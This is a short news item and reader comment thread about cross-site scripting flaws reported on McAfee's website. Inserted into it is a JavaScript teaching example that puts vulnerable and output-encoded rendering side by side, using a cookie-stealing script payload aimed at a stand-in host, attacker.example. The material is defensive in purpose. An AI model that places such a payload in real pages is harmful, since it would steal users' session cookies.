Flaws on McAfee's website leave it vulnerable to cross-site scripting and other attacks, security researchers warn. YGN Ethical Hacker Group also discovered various lesser information disclosure bugs on the security firm's website, according to an advisory published on a full disclosure mailing list on Monday. YGN said it …
Maybe that explains how they took my renewal subscription but failed to renew it, the thieves.
...you RENEWED? Ooohh, you masochist.
There's so much bad code, though
So many instances of the raw data from the user being echoed directly back into the page:
...and its variants from other languages - and plenty of books that are only a few years old, where programmers are actively being taught to do this sort of thing. Combine that with all those aging websites that are being "given a new lease of life" by wrapping them in AJAX guff (which no one on the development team really understands) and you've a recipe for ongoing disaster.
"Yeah, let's just response.write everything the user inputs back into the page in real time. If we're really lucky, they might get it into the database - in which case it could lurk there waiting to do its freaky shit, for years to come (because we never sanitise what comes back out of the database, either)."
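As an added illustration of the two patterns this commenter describes (this is example code written for this page, not code from The Register, McAfee or YGN), here is the "write it straight back into the page" bug and its stored cousin beside the fix, which is to HTML-encode at the point of output rather than trusting whatever came in or whatever comes back out of the database. The `escapeHtml` encoder, the two template functions and the in-memory comment store are all assumptions constructed for the demo, as are the sample inputs.

```javascript
// Added example, not from the original page or its commenters.
// Shows reflected XSS (raw input echoed into the response) and stored XSS
// (raw input saved, then rendered later without encoding), each beside the
// fixed version that encodes at output time.

// Output encoder for HTML text content and double-quoted attribute values.
// (Constructed helper; JS, URL and CSS contexts need different encoders.)
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')   // must run first so later entities are not double-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// The "response.write everything the user inputs" pattern: the search term
// lands in the markup verbatim, so a <script> in the query becomes live code.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Same template, encoded at output. The browser shows the payload as text.
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Stored XSS: a constructed in-memory array stands in for the database.
// Storing the raw string is not the bug; rendering it raw later is.
const commentStore = [];
function saveComment(author, body) {
  commentStore.push({ author, body });
}

// "We never sanitise what comes back out of the database" - everything the
// store holds is trusted as markup.
function renderCommentsVulnerable() {
  return commentStore.map(c => `<li><b>${c.author}</b>: ${c.body}</li>`).join('');
}

// Fixed: every field is encoded as it is placed into the page.
function renderCommentsSafe() {
  return commentStore
    .map(c => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join('');
}

// Constructed sample inputs: a benign search and a classic cookie-stealing payload.
const benignQuery = 'firewall';
const xssPayload = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// Walk both paths and report whether a live <script> tag reached the page.
function demo() {
  saveComment('mallory', xssPayload);
  return {
    reflectedVulnerable: renderSearchVulnerable(xssPayload).includes('<script>'),
    reflectedSafe: renderSearchSafe(xssPayload).includes('<script>'),
    storedVulnerable: renderCommentsVulnerable().includes('<script>'),
    storedSafe: renderCommentsSafe().includes('<script>'),
    benign: renderSearchSafe(benignQuery),
  };
}

console.log(demo());
```

The point of the stored case is that the fix lives in the rendering code, not in an input filter: a payload that slipped past whatever validation existed at submission time is harmless if every read-out is encoded for the context it is written into.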
Doesn't bode well if they've used their own McAfee Secure product to scan their sites to look for vulnerabilities now does it?
Considering you _need_ some kind of accredited, automated penetration testing software to maintain PCI DSS compliance - and McAfee IS one of those accredited suppliers - it doesn't exactly inspire confidence in the system as a whole.
Great story for all the McAfee flashing ads, hilarious that anyone still pays these jokers, everything they make attracts flies very quickly, until it stops steaming.
Intel will fix it and put it in the next version of their "Pentionium"* chips.
We are all gonna be safe....we all are
*The name has been made up, like the rest of them.
Hardly a shock...
The only machines I've seen with McAfee running on them are ones that were purchased with the infection already installed!
The numpties in the IT support here at work use it on all the corp desktops (XP, I feel like Fred Flintstone)
"Early on Monday March 28, 2011, various online news outlets reported on vulnerabilities in McAfee Web sites. McAfee is aware of these vulnerabilities and we are working to fix them."
In other words, "We've known about the problems for a while now but couldn't be bothered to fix them until someone aired our dirty laundry in public."
It was all a test...
and we passed. They are glad we finally noticed so that they may put up the real site. A drumroll if you please.
upgrade upgrade upgrade
Intel bought McAfee because it slows PCs down so much you have to upgrade, imagine that upgrade enforcing mechanism built in rather than a user option.
Bring back Dr. Solomons Magic Bullet disks!
Call me dumb but
1) A software company specializing in *security* software is only as good as its reputation. It takes years to build up and days to destroy. RSA springs to mind.
2) Tools exist to scan websites for vulnerabilities. If McAfee can't find one they should have the skills in house to write it.
3) Being owned by Intel should give them access to the corporate coffers if they are stupidly expensive.
Given what they do 1 month should have been *more* than enough time to get the problem elements disabled or replaced.
McAfee, must be very good?
After all it comes pre-installed on nearly all the computers in our local supermarket, and even if it's not, the McAfee box on the software shelf looks just wonderful!!
McAfee is an Anti-virus product???...........
...........I thought it was a performance slug to stop people computing too quickly.
Wow, The Reg has balls...
the industry is entitled to hold McAfee to a higher standard than other organisations, especially given it markets its McAfee Secure service as a way for enterprises to identify problems on their websites. ®
Uh, that would be like holding The Reg to a higher standard of Journalism. No one expects it, and the staff there isn't smart enough to accomplish it.